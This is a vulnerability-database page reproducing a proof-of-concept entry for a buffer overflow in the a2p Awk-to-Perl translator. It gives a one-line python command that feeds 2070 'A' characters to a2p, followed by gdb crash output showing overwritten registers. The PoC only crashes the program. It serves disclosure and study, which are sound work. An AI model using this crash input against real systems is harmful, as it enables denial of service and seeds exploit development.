Vulners
Lucene search
Awk to Perl 1.007-5 - Buffer Overflow (PoC)
# Exploit Title: Awk to Perl 1.007-5 - Buffer Overflow (PoC)
# Author: Todor Donev
# Date: 2018-07-11
# Software: Linux Awk to Perl Translator '/usr/bin/a2p'
# Version: 1.007-5
# CVE: N/A
# Tested on: CentOS 6.9, Ubuntu 10
[todor@adamantium ~]$ python -c "print 'A' * 2070" | a2p > /dev/null
Segmentation fault
[todor@adamantium ~]$ gdb a2p --quiet
Reading symbols from /usr/bin/a2p...(no debugging symbols found)...done.
Missing separate debuginfos, use: debuginfo-install *SNIPED*
(gdb) r bof
Starting program: /usr/bin/a2p bof
[Thread debugging using libthread_db enabled]
Program received signal SIGSEGV, Segmentation fault.
0x0074ee65 in fgets () from /lib/libc.so.6
(gdb) info reg
eax 0x1060 4192
ecx 0x1 1
edx 0x41414141 1094795585
ebx 0x880ff4 8916980
esp 0xbffff0f0 0xbffff0f0
ebp 0xbffff118 0xbffff118
esi 0x41414141 1094795585
edi 0x8062920 134621472
eip 0x74ee65 0x74ee65 <fgets+53>
eflags 0x210216 [ PF AF IF RF ID ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jul 2018 00:00Current
7.4High risk
Vulners AI Score7.4